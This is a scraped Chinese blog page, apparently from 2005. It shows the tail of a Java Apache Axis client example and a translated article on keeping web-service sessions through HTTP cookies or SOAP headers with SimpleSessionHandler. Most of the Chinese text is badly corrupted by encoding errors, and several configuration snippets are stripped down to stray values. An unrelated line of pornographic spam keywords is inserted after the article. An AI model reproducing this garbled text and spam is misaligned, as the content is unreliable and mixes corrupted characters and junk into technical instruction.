             call.setOperationName("getAge");//填写你要调用的方法名�U?BR>
             int ret =Integer.parseInt(("" + call.invoke( new Object[] {} )));

            System.out.println(ret);

         } catch (Exception e) {
             System.err.println(e.toString());
         }


        System.out.println("Finished the invoking.");

    }

}

关于业务调用��装到服务端�E�序里，然后部��v��可以了�Q�就�q�么��单�?BR>
4.资源

http://ws.apache.org/axis/

作者：郭徏�?nbsp;        gagaghost@gmail.com     http://blog.itpub.net/gagaghost

�W�笨 2005-08-14 09:20 发表评论

在Web Services中管理Sessions

�W�笨 — Sun, 14 Aug 2005 00:51:00 GMT
http://www.ftponline.com/china/XmlFile.aspx?ID=312
在Web service中通常采用两种公认技术来��理session�Q�一�U�是借助HTTP和HTTP cookies�Q�另一�U�是用SOAP headers。Axis能帮你实现这两种技术�?BR xmlns:fo="http://www.w3.org/1999/XSL/Format">by Kevin Jones
在Web service中没有一�U�管理session的标准方法，只有两种公认的技术，一�U�是依靠HTTP和HTTP cookies�Q�另一�U�，或许也是最重要的一�U�方法，��是用SOAP headers。Axis能帮助开发�h员实现这两种技术�?/P>
在Axis中缺省��用的是HTTP managed sessions。在一个服务器中这么做是十分容易的�Q�因为大多数对Axis Web service的管理是通过org.apache.axis.MessageContext的一个实例来完成的。在一个Axis Web service中你可以通过调用MessageContext�c�M��的静态方法来得到MessageContext的一个实例：

public class SessionService { public String echo(String in) { MessageContext mc = MessageContext.getCurrentContext();

MessageContext中有一个名为setMaintainSession的方法，调用它便可激�z�session。但在编写（Axis 1.1 RC2�Q�时�Q�session对象只有在被讉K��时才能激�z�，如下列代码所�C�：

public class SessionService { public String echo(String in) { MessageContext mc = MessageContext. getCurrentContext(); Session session = mc.getSession(); String name = (String)session.get("name"); return in; } }

�q�样会导致Axis架构生成一个set-cookie header�Q?

Set-Cookie: JSESSIONID=49EBBB19A1B2F8D10EE075F6F14CB8C9; Path=/axissessions

客户端需要在Cookie header中返回这个Cookie来保持该session。�ؓ了��axis�q�行状态下的客��L��能够实现�q�一点，��必��调用org.apache.axis.client.Service接口的setMaintainSession�Ҏ��。该接口是由WSDL2Java生成工具所生成的Locator�c�d��现的。调用该�Ҏ��之后�Q�Axis架构会自动将该cookie�q�回到服务器中：

public static void main(String[] args) { UseSessionsServiceLocator locator = new UseSessionsServiceLocator(); locator.setMaintainSession(true);

header看�v来就像这��P��

Cookie: JSESSIONID=49EBBB19A1B2F8D10EE075F6F14CB8C9

通过HTTP传输cookie是没有问题的�Q�但如果客户端或服务器不通过HTTP�Q�或使用的是通过多个Web services传入调用的multihop service�Q�那么这�U�方法就不那么有效了。一�U�更好的�Ҏ��是用SOAP headers来加载session id�?

Axis架构支持多个Handlers。通过在一个Web service��h��q�程中调用调栈（call stack�Q�，Handlers能够被放�|�到很多地方�Q�它可以和传输过�E�结合�v来，或者和一个Web service一起��用。Handlers可以被插入其中来处理Web service��h��中的��h��?或响应语句�?

Axis带有一个名为org.apache.axis.handlers.SimpleSessionHandler的handler�Q�它用于提供��Z��session��理的SOAP header。要使用�q�个��单的带有Web service的session handler�Q�你必须告知Axis架构��该handler��d��到handler链中。你可以通过��该handler信息��d��到server-config.wsdd来实现这一点；一个简单的处理�Ҏ��是定义一个包含额外配�|�Web service所需的WSDD文�g�Q�然后用Axis部��v工具来部�|�这个配�|�文件�?/P>
�q�个WSDD文�g看�v来就像这��P��

urn:kevinj:Sessions

该handler是和service分开定义�q�引用的�Q�虽然你可以在service内部定义它。注意这个handler是同时�ؓ了请求和响应而定义的�Q�这��q��保了�q�些headers能够在请求中被读取�ƈ��d��到响应中厅R��你可以用这个管理工��h��部��v它：

java -cp [classpath to axis bits here] / org.apache.axis.client.AdminClient / -lhttp://localhost/myservice/AxisServlet deploy.wsdd

现在服务器就可以�q�行了，在��用该handler时服务器无需处理��M��事情�Q�而headers能够自动被添加进去，��像�q�样�Q?

-1919645576528915916

要��用这个header�Q�Web service客户端必��能够读取它�q�了解其语法�Q�而Axis客户端可以解册��个问题�?/P>
要创��Z��个��用这个简单session的Axis客户端，你需要配�|�Axis客户端框架来使用该handler。过�E�同服务器端很相��|��但不是部�|�到服务器，而是在本地创建config文�g。你可以通过�q�行org.apache.axis.utils.Admin来实现这一炏V��运行以下代码：

org.apache.axis.utils.Admin client deploy.wsdd

�q�样��创��Z��一个client-config.wsdd文�g�Q�它同样也包含handler代码�?

urn:kevinj:Sessions

��Z��使客��L��能够利用�q�个handler�Q�你必须��client-config.wsdd文�g��d��到客��L��的classpath中。然后由Axis框架代表客户端来��d��q�响应这些headers。同��P��客户端代码无需处理��M��事情便可以��用它了�?

关于作�?
Kevin Jones是一名有着15�q�开发经验的开发�h员。最�q�四�q�来�Q�他一直从事Java�~�程斚w��的研�I�和教学�Q�最�q�，他主要研�I�HTTP和XML。Kevin住在U.K.�Q�他为Developmentor工作�Q�这是一家以United States 和Europe为基圎ͼ�主要做Java和Microsoft�q�_��的技术培训的公司。Kevin的联�p�L��式是�Q?A href="mailto:kevinj@develop.com" target=_blank xmlns:fo="http://www.w3.org/1999/XSL/Format">kevinj@develop.com�?img src ="http://m.tkk7.com/kapok/aggbug/10062.html" width = "1" height = "1" />

�W�笨 2005-08-14 08:51 发表评论

亚洲国产精品人人做人人爽,亚洲国产精品第一区二区三区,99亚洲乱人伦aⅴ精品

SSL�?X509

了解安全性断�a�标记语言

Web服务架构及其规范入门

XML和Infoset

SOAP

消息交换模式

��d��

安全会话

安全�{�略

�pȝ��联盟

一致性协议——可靠的消息传递和事务

枚�D、传输和事�g

附录A�Q�术语表

附录C�Q�常见的安全��d��

对主机的��d��

Hello, Axis

2.开发webservice服务

3.开发客��L���E�序

4.资源

在Web Services中管理Sessions

3.开发客��L��E�序